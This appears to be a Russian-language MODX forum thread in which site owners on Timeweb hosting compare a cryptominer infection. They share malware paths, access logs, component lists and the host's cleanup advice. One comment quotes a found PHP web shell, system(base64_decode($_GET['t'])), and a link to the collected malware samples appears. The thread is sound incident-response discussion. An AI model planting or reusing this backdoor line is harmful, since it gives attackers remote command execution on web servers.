Вирусы майнеры
Всем привет,
Ребят а были ли у вас проблемы с майнерами, которые вызывали нагрузку на хостинге. У меня уже несколько случаев такого дела, при чем проекты могли быть созданы 4 года назад и свежие (до года)
Вот пример то что находится
Нашел файл с вредоносными вставками:
/public_html/assets/components/pdotools/action.php
Сам вредонос в директории:
.local/session/config/logs/php-fpm/model/observer/
где находятся файлы:
php — 'это сам майнер (вредонос)
package.json
SHA256SUMS
systemd
есть такие запросы по ней открывается Compact database management
GET /assets/components/ace/emmet/action.php?username=текст&db=текст&select=modx_manager_log…
Ядро свежее 2.8.7
Ребят а были ли у вас проблемы с майнерами, которые вызывали нагрузку на хостинге. У меня уже несколько случаев такого дела, при чем проекты могли быть созданы 4 года назад и свежие (до года)
Вот пример то что находится
Нашел файл с вредоносными вставками:
/public_html/assets/components/pdotools/action.php
Сам вредонос в директории:
.local/session/config/logs/php-fpm/model/observer/
где находятся файлы:
php — 'это сам майнер (вредонос)
package.json
SHA256SUMS
systemd
есть такие запросы по ней открывается Compact database management
GET /assets/components/ace/emmet/action.php?username=текст&db=текст&select=modx_manager_log…
Ядро свежее 2.8.7
10 мая 2025, 12:42
Комментарии: 30
смотрите папки и файлы. все не сканировал.
(удалил пока tinymce и ace), обновил modx что бы переписать все системные файлы.
.local
.share
.config
.fmx
/public_html/assets/components/tinymce/action.php
/public_html/assets/components/pdotools/action.php
/public_html/assets/components/ace/emmet/action.php
тут все что удалось найти disk.yandex.ru/d/pqO3KCB-IhXUiw
(удалил пока tinymce и ace), обновил modx что бы переписать все системные файлы.
.local
.share
.config
.fmx
/public_html/assets/components/tinymce/action.php
/public_html/assets/components/pdotools/action.php
/public_html/assets/components/ace/emmet/action.php
тут все что удалось найти disk.yandex.ru/d/pqO3KCB-IhXUiw
Список используемых на сайте компонентов:
Ace 1.9.3-pl
AjaxForm 1.1.9-pl
Comparison 1.2.14-pl
Console 2.2.2-pl
controlErrorLog 1.4.6-pl
FormIt 4.2.7-pl
gTranslit 1.1.5-pl
lmims 0.0.2-beta
MIGX 3.0.0-alpha5
MinifyX 2.0.3-pl
miniShop2 3.0.7-pl
mSearch2 1.14.9-pl
msFavorites 3.0.5-beta
msOptionsPrice2 2.5.22-beta
pdoTools 2.13.2-pl
pThumb 2.3.3-pl
Redirector 2.0.10-pl
Resizer 1.0.2-beta
seotext 1.0.6-beta
inyMCE Rich Text Editor 2.0.9-pl
translit 1.0.0-beta
-------------------------------
Ace 1.9.3-pl
AjaxForm 1.1.9-pl
Comparison 1.2.14-pl
Console 2.2.2-pl
controlErrorLog 1.4.6-pl
FormIt 4.2.7-pl
gTranslit 1.1.5-pl
lmims 0.0.2-beta
MIGX 3.0.0-alpha5
MinifyX 2.0.3-pl
miniShop2 3.0.7-pl
mSearch2 1.14.9-pl
msFavorites 3.0.5-beta
msOptionsPrice2 2.5.22-beta
pdoTools 2.13.2-pl
pThumb 2.3.3-pl
Redirector 2.0.10-pl
Resizer 1.0.2-beta
seotext 1.0.6-beta
inyMCE Rich Text Editor 2.0.9-pl
translit 1.0.0-beta
-------------------------------
Как было у меня
May 4 01:51:38 vh432 apache_access[80853]: site.ru 69.16.157.71 — - [04/May/2025:01:51:36 +0300] «POST /ass_7856/components/easyredirects/action.php?username=cv95498_site HTTP/1.0» 302 20 «site.ru/ass_7856/components/easyredirects/action.php?username=cv95498_site» «Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36»
May 4 01:58:41 vh432 apache_access[80853]: site.ru 69.16.157.71 — - [04/May/2025:01:58:41 +0300] «POST /adminer-5.2.1.php HTTP/1.0» 302 20 «site.ru/adminer-5.2.1.php» «Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36»
May 4 01:51:38 vh432 apache_access[80853]: site.ru 69.16.157.71 — - [04/May/2025:01:51:36 +0300] «POST /ass_7856/components/easyredirects/action.php?username=cv95498_site HTTP/1.0» 302 20 «site.ru/ass_7856/components/easyredirects/action.php?username=cv95498_site» «Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36»
May 4 01:58:41 vh432 apache_access[80853]: site.ru 69.16.157.71 — - [04/May/2025:01:58:41 +0300] «POST /adminer-5.2.1.php HTTP/1.0» 302 20 «site.ru/adminer-5.2.1.php» «Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36»
он запрос порезанный прислал, там доступы от БД отправляются, т.е вирус уже знает данные для входа.
Были еще файлы, которые как я понял отправлял консольный запрос сервер, как мне кажется для запуска systemd, который уже циклично в течение 10 секунд проверял активирован ли майнер и если нет, то запускал его.
Но я нифига не безопатсник — это мои догадки
Были еще файлы, которые как я понял отправлял консольный запрос сервер, как мне кажется для запуска systemd, который уже циклично в течение 10 секунд проверял активирован ли майнер и если нет, то запускал его.
Но я нифига не безопатсник — это мои догадки
Забавно, вирусы, которые убирают конкурентов.
Мне кажется надо вот эти модули прошерстить, оставить методом исключения парочку, потом удалить эти модули на зараженных сайтах и посмотреть будет ли возникать повторы.
Ace
Console
MIGX
MinifyX
miniShop2
mSearch2
msOptionsPrice2
pdoTools
tinyMCE Rich Text Editor
translit
Мне кажется надо вот эти модули прошерстить, оставить методом исключения парочку, потом удалить эти модули на зараженных сайтах и посмотреть будет ли возникать повторы.
Ace
Console
MIGX
MinifyX
miniShop2
mSearch2
msOptionsPrice2
pdoTools
tinyMCE Rich Text Editor
translit
Такая же проблема. Таймвеб заблокировал сайты по превышению нагрузки на процессор.
В качестве рекомендаций получены следующие инструкции.
Может кому-то пригодятся, сам пока не вникал
В качестве рекомендаций получены следующие инструкции.
Может кому-то пригодятся, сам пока не вникал
В первую очередь рекомендуем проверить следующие директории, так как очень часто подозрительные процессы запускаются именно из них:
~/.config/session/config/logs/php-fpm/model/observer/
~/.local/session/config/logs/php-fpm/model/observer/
~/.gnupg/session/config/logs/php-fpm/model/observer/
~/.gnupg/php-fpm/session/mods/logs/config/observer/
~/.gnupg/config/mods/logs/session/php-fpm/observer/
~/.config/htop/defunct.dat
~/.config/htop/defunct
Если директории из списка выше существуют, рекомендую по возможности их удалить.
Дополнительно прошу удалить файл ~/.profile
Также вижу, после разблокировки на аккаунте запустились следующие подозрительные процессы:
[slub_flushwq]
Поэтому рекомендую подключиться к консоли аккаунта и выполнить команду:
killall -9 -u $(whoami)
Которая завершит все пользовательские процессы, включая вредоносные.
Ни у кого не возникло ощущение, что проблема в самом timeweb?
Читаю комменты выше и вижу что все хостятся на таймвебе. У нас тоже около 30 сайтов на таймвебе, около 30 у других хостеров. Проболемы возникают пока только на тех, кто на таймвебе.
Есть среди пострадавших те, у кого иной хостинг?
Кто то уже проводил анализ своего сайта на предмет, как именно сайт становится источником заражения? (потому что я пока тупо не успеваю, очень долго в переписке прощу, чтобы хостинг вернул доступ к директории нашего пользователя, они пишут что вернули, я вхожу по ssh но через считанные секунды мне хостинг снова меняет права на мою директорию и я снова не могу даже скачать якобы зараженные файлы сайта. И так по кругу).
Читаю комменты выше и вижу что все хостятся на таймвебе. У нас тоже около 30 сайтов на таймвебе, около 30 у других хостеров. Проболемы возникают пока только на тех, кто на таймвебе.
Есть среди пострадавших те, у кого иной хостинг?
Кто то уже проводил анализ своего сайта на предмет, как именно сайт становится источником заражения? (потому что я пока тупо не успеваю, очень долго в переписке прощу, чтобы хостинг вернул доступ к директории нашего пользователя, они пишут что вернули, я вхожу по ssh но через считанные секунды мне хостинг снова меняет права на мою директорию и я снова не могу даже скачать якобы зараженные файлы сайта. И так по кругу).
У меня именно и только такое ощущение, что проблема в хостинге. Ни на каких других данная проблема не проявилась.
У timeweb появилась функция изоляции сайта, не знаю как давно, обнаружил ее недавно. по умолчанию она выключена, может включенная она поможет, если заражение пришло от соседских аккаунтов.
У timeweb появилась функция изоляции сайта, не знаю как давно, обнаружил ее недавно. по умолчанию она выключена, может включенная она поможет, если заражение пришло от соседских аккаунтов.
Пару дней назад тоже самое у одного клиента. Найти закономерностей или каких-то уязвимых пакетов не получилось.
А вот хостинг как раз Timeweb — и очень похоже, что именно у них где-то дырка. Что характерно — заблокировали молча, без всяких предупреждений о нагрузке — потом изучая график нагрузки стало понятно, что уже больше месяца этот майнер работал.
Так же рекомендую произвести поиск каким-нибудь антивирусам по популярным функциям типа base64_decode или развернуть старый бэкап — так как было найдено 3 бэкдора в разных папках сайта + админер в одной из папок, которых ранее точно не было.
А вот хостинг как раз Timeweb — и очень похоже, что именно у них где-то дырка. Что характерно — заблокировали молча, без всяких предупреждений о нагрузке — потом изучая график нагрузки стало понятно, что уже больше месяца этот майнер работал.
Так же рекомендую произвести поиск каким-нибудь антивирусам по популярным функциям типа base64_decode или развернуть старый бэкап — так как было найдено 3 бэкдора в разных папках сайта + админер в одной из папок, которых ранее точно не было.
Заметил данный пост, и не я один такой)) Сайт отрубали, пришлось скачивать его на локалку, прогонять через утилиту — ai-bolit.
Сайт был версии 2.7.2
Зараженные директории:
.local, .config — в которых и была пакасть.
Компоненты обновил, систему обновил, дрянь удалил.
3й День пока все ок
Сайт был версии 2.7.2
Зараженные директории:
- assets/components/formit/js/mgr/widgets/migrate.panel.php
- assets/components/migx/js/mgr/widgets/grids/migxgallery.grid.php
- assets/components/pdotools/js/pdopage.min.php
<?php system(base64_decode($_GET['t'])).local, .config — в которых и была пакасть.
Компоненты обновил, систему обновил, дрянь удалил.
3й День пока все ок
Пока ни один в теме не сказал, что у него сайт заразился на каком-то другом хостинге в эти дни.
У меня на поддержке больше 5 сайтов с разными версиями modx и разными дополнениями, везде все ок, только один на таймвебе заразился.
Причем после чистки этого сайта, я ничего абсолютно не обновлял, а заражений новых с того момента нет — если бы была дырка или уязвимость в modx и его компонентах — почти наверняка уже бы снова заразили.
У меня на поддержке больше 5 сайтов с разными версиями modx и разными дополнениями, везде все ок, только один на таймвебе заразился.
Причем после чистки этого сайта, я ничего абсолютно не обновлял, а заражений новых с того момента нет — если бы была дырка или уязвимость в modx и его компонентах — почти наверняка уже бы снова заразили.
Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.
Здесь упомянуты:
| Компонент | Текущая версия | Закачки |
| pdoTools | 2.13.2-pl от 02.09.2021 | 54 286 |
| Ace | 1.9.4-pl от 23.02.2024 | 14 988 |
| MinifyX | 1.7.1-pl от 25.03.2019 | 14 298 |
| AjaxForm | 1.2.2-pl от 17.10.2021 | 19 552 |
| Comparison | 1.2.14-pl от 22.03.2019 | 1 183 |
| controlErrorLog | 1.4.6-pl от 22.01.2022 | 5 524 |
| gTranslit | 1.1.5-pl от 06.12.2021 | 686 |
| miniShop2 | 4.4.0-pl от 06.08.2024 | 26 457 |
| mSearch2 | 1.14.12-pl от 09.01.2025 | 19 328 |
| msFavorites | 3.0.11-beta от 08.09.2024 | 2 865 |
| msOptionsPrice2 | 2.5.22-beta от 29.11.2019 | 5 673 |
| easyRedirects | 1.1.2-pl от 13.02.2024 | 168 |
Вчера в 09:41
В кабинете яндекса написано такое:Написано, ага, только я когда добавил ограничения по домену ключ перестал работать.
22 мая 2025, 22:41
тот же вопрос по диапозону дат. готового решения так никто и не озвучит?
22 мая 2025, 18:08
Пока ни один в теме не сказал, что у него сайт заразился на каком-то другом хостинге в эти дни.
У меня на поддержке больше 5 сайтов с разными версиям...
22 мая 2025, 18:00
Да, конечно. Разве что кроме архива core.transport.zip.
Смысл же в том, чтобы сравнить свои файлы с эталонными на предмет изменений. Файлы ядра мен...
22 мая 2025, 17:00
Да, ещё добавлю момент важный, с которым я столкнулся в самом начале, после установки модуля. В системных настройках MiniShop3 есть параметр ms3_front...
21 мая 2025, 08:49
Бинго!
Так-то я знаю, что в leftJoin указываются соответствия строк таблиц, но что после объявления псевдонима дальше используется только он — это я ...
20 мая 2025, 22:04
я сегодня уже после того как столкнулся с ошибкой обновил до актуальных ModX c 3.0.6 и Formit тоже версия была 2024 года
19 мая 2025, 20:45
Как ни удивительно — но все ж добавил поле), смотрите свежий релиз
19 мая 2025, 16:30
Ну так это будет для любого пакета работать. На видео же для MiniShop3 тоже показано
16 мая 2025, 14:59
Здравствуйте. А с т-банк этот компонент пойдет?